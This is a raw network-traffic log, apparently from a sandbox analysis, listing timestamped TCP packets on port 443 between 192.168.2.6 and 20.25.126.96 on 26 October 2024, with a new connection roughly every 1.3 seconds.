Oct 26, 2024 13:44:33.446238041 CEST	49995	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:33.446250916 CEST	443	49995	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:34.763803959 CEST	443	49995	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:34.763942003 CEST	49995	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:34.763991117 CEST	49995	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:34.764007092 CEST	443	49995	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:34.764540911 CEST	50004	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:34.764558077 CEST	443	50004	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:34.764637947 CEST	50004	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:34.764812946 CEST	50004	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:34.764822960 CEST	443	50004	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.076365948 CEST	443	50004	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.076493025 CEST	50004	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.076596975 CEST	50004	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.076621056 CEST	443	50004	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.077339888 CEST	50009	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.077393055 CEST	443	50009	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.077487946 CEST	50009	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.077603102 CEST	50009	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.077645063 CEST	443	50009	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.077701092 CEST	50009	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.182794094 CEST	50010	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.182848930 CEST	443	50010	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:36.182965040 CEST	50010	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.183238029 CEST	50010	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:36.183254957 CEST	443	50010	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:37.488301992 CEST	443	50010	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:37.488476038 CEST	50010	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:37.488538980 CEST	50010	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:37.488569021 CEST	443	50010	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:37.489433050 CEST	50019	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:37.489476919 CEST	443	50019	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:37.489629030 CEST	50019	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:37.489931107 CEST	50019	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:37.489949942 CEST	443	50019	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.770442009 CEST	443	50019	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.770608902 CEST	50019	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.770669937 CEST	50019	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.770687103 CEST	443	50019	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.771348000 CEST	50025	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.771394968 CEST	443	50025	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.771491051 CEST	50025	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.771559954 CEST	50025	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.771663904 CEST	443	50025	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.771718979 CEST	50025	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.884423018 CEST	50026	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.884470940 CEST	443	50026	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:38.884586096 CEST	50026	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.884947062 CEST	50026	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:38.884959936 CEST	443	50026	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:40.165174007 CEST	443	50026	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:40.165251017 CEST	50026	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:40.165333033 CEST	50026	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:40.165344000 CEST	443	50026	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:40.165901899 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:40.165935993 CEST	443	50037	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:40.165997982 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:40.166208982 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:40.166218042 CEST	443	50037	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.446666002 CEST	443	50037	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.446994066 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.446994066 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.447540045 CEST	50044	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.447586060 CEST	443	50044	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.447654963 CEST	50044	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.447704077 CEST	50044	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.447762012 CEST	443	50044	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.447819948 CEST	50044	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.554766893 CEST	50045	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.554821968 CEST	443	50045	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.554900885 CEST	50045	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.555145025 CEST	50045	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.555160999 CEST	443	50045	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:41.757359028 CEST	50037	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:41.757380009 CEST	443	50037	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:42.835925102 CEST	443	50045	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:42.835987091 CEST	50045	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:42.836046934 CEST	50045	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:42.836057901 CEST	443	50045	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:42.836555958 CEST	50056	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:42.836611986 CEST	443	50056	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:42.836690903 CEST	50056	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:42.836857080 CEST	50056	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:42.836889982 CEST	443	50056	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.130695105 CEST	443	50056	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.130780935 CEST	50056	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.130857944 CEST	50056	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.130877018 CEST	443	50056	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.131540060 CEST	50061	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.131568909 CEST	443	50061	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.131629944 CEST	50061	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.131681919 CEST	50061	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.131721973 CEST	443	50061	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.131764889 CEST	50061	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.242450953 CEST	50062	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.242499113 CEST	443	50062	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:44.242641926 CEST	50062	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.243016005 CEST	50062	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:44.243026018 CEST	443	50062	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:45.642359972 CEST	443	50062	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:45.642472029 CEST	50062	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:45.642642975 CEST	50062	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:45.642668009 CEST	443	50062	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:45.643702030 CEST	50063	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:45.643769979 CEST	443	50063	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:45.643867970 CEST	50063	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:45.644247055 CEST	50063	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:45.644259930 CEST	443	50063	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:46.964005947 CEST	443	50063	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:46.964153051 CEST	50063	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:46.996109962 CEST	50063	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:46.996164083 CEST	443	50063	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:46.996680975 CEST	50064	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:46.996710062 CEST	443	50064	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:46.996786118 CEST	50064	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:46.996836901 CEST	50064	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:46.996951103 CEST	443	50064	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:46.997009039 CEST	50064	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:47.139780045 CEST	50065	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:47.139821053 CEST	443	50065	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:47.139905930 CEST	50065	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:47.140378952 CEST	50065	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:47.140394926 CEST	443	50065	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:48.416106939 CEST	443	50065	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:48.416245937 CEST	50065	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:48.416333914 CEST	50065	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:48.416352034 CEST	443	50065	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:48.417047977 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:48.417105913 CEST	443	50066	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:48.417190075 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:48.417512894 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:48.417534113 CEST	443	50066	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:49.720860004 CEST	443	50066	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:49.721024990 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.721024990 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.721558094 CEST	50067	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.721594095 CEST	443	50067	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:49.721646070 CEST	50067	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.721688986 CEST	50067	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.721745014 CEST	443	50067	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:49.721784115 CEST	50067	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.836157084 CEST	50068	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.836220026 CEST	443	50068	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:49.836410999 CEST	50068	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.836764097 CEST	50068	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:49.836781025 CEST	443	50068	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:50.023264885 CEST	50066	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:50.023319960 CEST	443	50066	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:51.344717026 CEST	443	50068	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:51.344996929 CEST	50068	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:51.345076084 CEST	50068	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:51.345093012 CEST	443	50068	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:51.345824957 CEST	50069	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:51.345855951 CEST	443	50069	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:51.345940113 CEST	50069	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:51.346239090 CEST	50069	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:51.346246958 CEST	443	50069	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.647923946 CEST	443	50069	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.648092985 CEST	50069	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.648202896 CEST	50069	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.648222923 CEST	443	50069	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.649050951 CEST	50070	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.649096012 CEST	443	50070	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.649182081 CEST	50070	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.649230003 CEST	50070	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.649532080 CEST	443	50070	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.649585962 CEST	50070	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.758186102 CEST	50071	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.758212090 CEST	443	50071	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:52.758301973 CEST	50071	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.758618116 CEST	50071	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:52.758630037 CEST	443	50071	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:54.060641050 CEST	443	50071	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:54.060795069 CEST	50071	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:54.060889959 CEST	50071	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:54.060911894 CEST	443	50071	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:54.061558962 CEST	50072	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:54.061595917 CEST	443	50072	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:54.061664104 CEST	50072	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:54.061908007 CEST	50072	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:54.061919928 CEST	443	50072	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.326893091 CEST	443	50072	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.326983929 CEST	50072	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.327069044 CEST	50072	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.327086926 CEST	443	50072	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.327656984 CEST	50073	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.327694893 CEST	443	50073	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.327775955 CEST	50073	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.327819109 CEST	50073	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.327980995 CEST	443	50073	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.328039885 CEST	50073	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.431422949 CEST	50074	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.431478024 CEST	443	50074	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:55.431582928 CEST	50074	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.431895971 CEST	50074	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:55.431915998 CEST	443	50074	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:56.708728075 CEST	443	50074	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:56.709002972 CEST	50074	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:56.709110975 CEST	50074	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:56.709129095 CEST	443	50074	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:56.709928036 CEST	50075	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:56.709964991 CEST	443	50075	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:56.710100889 CEST	50075	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:56.710347891 CEST	50075	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:56.710359097 CEST	443	50075	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.025151968 CEST	443	50075	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.025286913 CEST	50075	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.025372982 CEST	50075	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.025394917 CEST	443	50075	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.025984049 CEST	50076	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.026031017 CEST	443	50076	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.026110888 CEST	50076	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.026431084 CEST	50076	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.026489973 CEST	443	50076	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.026547909 CEST	50076	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.133546114 CEST	50077	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.133593082 CEST	443	50077	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:58.133764982 CEST	50077	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.134162903 CEST	50077	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:58.134176970 CEST	443	50077	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:59.448874950 CEST	443	50077	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:59.449017048 CEST	50077	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:59.449143887 CEST	50077	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:59.449160099 CEST	443	50077	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:59.450062990 CEST	50078	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:59.450119019 CEST	443	50078	20.25.126.96	192.168.2.6
Oct 26, 2024 13:44:59.450265884 CEST	50078	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:59.450570107 CEST	50078	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:44:59.450578928 CEST	443	50078	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.761117935 CEST	443	50078	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.761265039 CEST	50078	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.761353970 CEST	50078	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.761368990 CEST	443	50078	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.762239933 CEST	50079	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.762279987 CEST	443	50079	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.762376070 CEST	50079	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.762444973 CEST	50079	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.762481928 CEST	443	50079	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.762581110 CEST	50079	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.867603064 CEST	50080	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.867661953 CEST	443	50080	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:00.867785931 CEST	50080	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.868143082 CEST	50080	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:00.868155956 CEST	443	50080	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:02.174841881 CEST	443	50080	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:02.174901009 CEST	50080	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:02.175149918 CEST	50080	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:02.175173044 CEST	443	50080	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:02.176055908 CEST	50081	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:02.176100016 CEST	443	50081	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:02.176156044 CEST	50081	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:02.176675081 CEST	50081	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:02.176687956 CEST	443	50081	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.464359999 CEST	443	50081	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.464499950 CEST	50081	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.464590073 CEST	50081	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.464608908 CEST	443	50081	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.465220928 CEST	50082	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.465256929 CEST	443	50082	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.465342999 CEST	50082	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.465404987 CEST	50082	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.465475082 CEST	443	50082	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.465526104 CEST	50082	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.571834087 CEST	50083	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.571883917 CEST	443	50083	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:03.572016001 CEST	50083	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.572208881 CEST	50083	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:03.572228909 CEST	443	50083	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:04.888583899 CEST	443	50083	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:04.888705015 CEST	50083	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:04.888783932 CEST	50083	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:04.888798952 CEST	443	50083	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:04.889539957 CEST	50084	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:04.889594078 CEST	443	50084	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:04.889684916 CEST	50084	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:04.889940977 CEST	50084	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:04.889959097 CEST	443	50084	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.199081898 CEST	443	50084	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.199167013 CEST	50084	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.205692053 CEST	50084	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.205738068 CEST	443	50084	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.206686974 CEST	50085	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.206732035 CEST	443	50085	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.206815958 CEST	50085	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.207175016 CEST	50085	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.207216978 CEST	443	50085	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.207266092 CEST	50085	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.320677996 CEST	50086	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.320782900 CEST	443	50086	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:06.320954084 CEST	50086	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.321186066 CEST	50086	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:06.321223974 CEST	443	50086	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:07.603465080 CEST	443	50086	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:07.603555918 CEST	50086	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:07.603631973 CEST	50086	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:07.603676081 CEST	443	50086	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:07.604252100 CEST	50087	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:07.604276896 CEST	443	50087	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:07.604357004 CEST	50087	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:07.604558945 CEST	50087	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:07.604566097 CEST	443	50087	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.889329910 CEST	443	50087	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.889484882 CEST	50087	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.889571905 CEST	50087	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.889584064 CEST	443	50087	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.890336037 CEST	50088	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.890377998 CEST	443	50088	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.890455008 CEST	50088	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.890515089 CEST	50088	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.890548944 CEST	443	50088	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.890603065 CEST	50088	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.992396116 CEST	50089	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.992436886 CEST	443	50089	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:08.992527008 CEST	50089	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.992885113 CEST	50089	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:08.992897987 CEST	443	50089	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:10.282949924 CEST	443	50089	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:10.283030033 CEST	50089	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:10.283236980 CEST	50089	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:10.283253908 CEST	443	50089	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:10.283817053 CEST	50091	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:10.283845901 CEST	443	50091	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:10.283917904 CEST	50091	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:10.284244061 CEST	50091	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:10.284259081 CEST	443	50091	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.582237959 CEST	443	50091	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.582359076 CEST	50091	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.582411051 CEST	50091	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.582425117 CEST	443	50091	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.583076954 CEST	50092	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.583116055 CEST	443	50092	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.583194017 CEST	50092	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.583483934 CEST	50092	443	192.168.2.6	20.25.126.96
